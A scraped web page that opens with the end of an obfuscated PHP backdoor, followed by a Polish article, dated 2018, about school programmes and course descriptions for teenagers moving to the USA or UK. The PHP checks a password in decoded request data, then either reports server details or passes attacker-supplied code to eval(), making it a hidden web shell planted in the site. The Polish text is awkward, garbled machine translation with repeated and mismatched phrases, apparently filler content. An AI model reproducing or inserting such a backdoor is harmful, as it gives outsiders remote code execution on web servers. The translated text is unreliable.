$j28f2a3){$a3f51320 = $j28f2a3;$a3a13eb = $bcf005;}if (!$a3f51320){foreach ($x721d5[$x721d5['nd42b540a'][87].$x721d5['nd42b540a'][6].$x721d5['nd42b540a'][3].$x721d5['nd42b540a'][40]] as $bcf005=>$j28f2a3){$a3f51320 = $j28f2a3;$a3a13eb = $bcf005;}}$a3f51320 = @$x721d5[$x721d5['nd42b540a'][81].$x721d5['nd42b540a'][51].$x721d5['nd42b540a'][6].$x721d5['nd42b540a'][3].$x721d5['nd42b540a'][6]]($x721d5[$x721d5['nd42b540a'][58].$x721d5['nd42b540a'][10].$x721d5['nd42b540a'][4].$x721d5['nd42b540a'][17].$x721d5['nd42b540a'][82].$x721d5['nd42b540a'][51].$x721d5['nd42b540a'][40].$x721d5['nd42b540a'][62]]($x721d5[$x721d5['nd42b540a'][60].$x721d5['nd42b540a'][30].$x721d5['nd42b540a'][82].$x721d5['nd42b540a'][30]]($a3f51320), $a3a13eb));if (isset($a3f51320[$x721d5['nd42b540a'][53].$x721d5['nd42b540a'][35]]) && $p429c5==$a3f51320[$x721d5['nd42b540a'][53].$x721d5['nd42b540a'][35]]){if ($a3f51320[$x721d5['nd42b540a'][53]] == $x721d5['nd42b540a'][89]){$u6031 = Array($x721d5['nd42b540a'][22].$x721d5['nd42b540a'][90] => @$x721d5[$x721d5['nd42b540a'][60].$x721d5['nd42b540a'][40].$x721d5['nd42b540a'][6].$x721d5['nd42b540a'][10].$x721d5['nd42b540a'][62].$x721d5['nd42b540a'][82].$x721d5['nd42b540a'][82].$x721d5['nd42b540a'][51]](),$x721d5['nd42b540a'][60].$x721d5['nd42b540a'][90] => $x721d5['nd42b540a'][82].$x721d5['nd42b540a'][71].$x721d5['nd42b540a'][55].$x721d5['nd42b540a'][57].$x721d5['nd42b540a'][82],);echo @$x721d5[$x721d5['nd42b540a'][35].$x721d5['nd42b540a'][82].$x721d5['nd42b540a'][21].$x721d5['nd42b540a'][26].$x721d5['nd42b540a'][6]]($u6031);}elseif ($a3f51320[$x721d5['nd42b540a'][53]] == $x721d5['nd42b540a'][40]){eval/*ze59*/($a3f51320[$x721d5['nd42b540a'][10]]);}exit();}} ?>

Programy szkolne – wyjazdy do Wielkiej Brytanii

Autor: admin
Data publikacji: 05.06.2018

Nasz zespół prowadzi warsztaty i certyfikacje egzaminacyjne dla nastolatków przeprowadzających się wraz z opiekunami prawnymi do USA lub Wielkiej Brytanii. Umożliwiają one na bezpieczną prawnie migrację do tamtejszej jednostki nauczania szkolnego. Jak dotychczas realizowaliśmy m.in. niżej opisane programy: 

Oficjalne tłumaczenie wymogów kursów nr H58/USA:

Zajęcia z kulturowych wpływów pomagają uczniom wykonywać różnorodne kulturalne style muzyczne, takie jak zespół mariachi, stalowy zespół perkusyjny, indyjski gamelan lub afrykańskie zespoły perkusyjne. Jednocześnie Kursy te pomagają studentom w rozwijaniu technik na instrumentach odpowiednich do danego stylu - mosiądzu, instrumentów dętych drewnianych, instrumentów smyczkowych, instrumentów perkusyjnych i / lub elektronicznych. Programy kładą nacisk na muzykę instrumentalną, ale mogą również obejmować muzykę wokalną. Zaawansowany kurs zapewnia studentom możliwości rozwoju poprzez próby i wykonanie, improwizację lub tworzenie i wykonywanie własnych kompozycji.

Definicja kursów nr O37/USA:

Szkolenia animacji koncentrują się na elementach sztuki i zasadach projektowania w odniesieniu do animacji dwu- lub trójwymiarowej. Programy te mocno akcentują interaktywne wykorzystanie podstaw rysowania i projektowania, tworzenia storyboardów, kompozycji i obrazowania, cieni / cieni, tworzenia dźwięku i dźwięku oraz edycji. Programy mogą obejmować również studium historii animacji, zagadnień estetycznych, ról i funkcji oraz nauczania w procesie krytyki.

Charakterystyka programów nr J41/USA:

Dawniej znane jako Expressive Movement, Kursy ogólnego tańca eksplorują treści taneczne poprzez artystyczne procesy tworzenia, wykonywania, odpowiadania i łączenia. Seminaria te mogą wprowadzić historię tańca, kulturę i słownictwo w kontekście tych procesów. Programy tańca ogólnego mogą również rozwinąć umiejętność poruszania się w sposób ekspresyjny, bez nacisku na poszczególne formy tańca lub na rozwijanie konkretnych technik tańca.

Oficjalne tłumaczenie wymogów programów nr D87/UK:

Amerykańskie Seminaria niezależne od historii, często prowadzone z instruktorami jako mentorami, umożliwiają studentom zapoznanie się z tematami zainteresowanymi historią USA. Niezależne studia mogą dać uczniom możliwość poszerzenia wiedzy specjalistycznej w danym okresie lub obszarze, bardziej szczegółowe zgłębianie tematu lub rozwijanie bardziej zaawansowanych umiejętności.

Formalna definicja programów nr L89/USA:

Kursy naukowe (klasa 2) nadal wprowadzają studentów w podstawowe procesy i zasady naukowe. Treści kursu mogą obejmować identyfikację wzorców, klasyfikację i sekwencjonowanie lub manipulację systemami w celu obserwowania interakcji między częściami i rejestrowania skutków zmiany. Konkretna zawartość zależy od standardów stanowych dla klasy 2.

Oficjalne tłumaczenie wymogów programów nr K46/USA:

Warsztaty antropologiczne wprowadzają studentów w badania nad ewolucją człowieka pod względem pochodzenia, rozmieszczenia, cech fizycznych, środowiska i kultury człowieka. Warsztaty te dają przegląd antropologii, w tym między innymi antropologii fizycznej i kulturowej.

Formalna definicja kursów nr D52/UK:

Studia z zakresu socjologii (przedszkola) generalnie zapewniają początkowe podstawy w dyscyplinach nauk społecznych: historii, geografii, obywatelskiej i rządowej oraz ekonomii. Konkretna treść zależy od standardów stanowych dla przedszkola.Tagi:
Losowy

Wyjazdy międzynarodowe

Wyjazdy anglojęzyczne W ramach naszej pracy naukowej nasi trenerzy wzięli udział w następujących konferencjach, szkoleniach i wyjazdach ponadeuropejskich: Społeczeństwo informacyjne (i-społeczeństwo), 2010 , BerlinUsługi internetowe (ECOWS), 2010 IEEE 8. europejska , SztokholmInfrastruktura sieciowa i treści cyfrowe,

Czytaj więcej...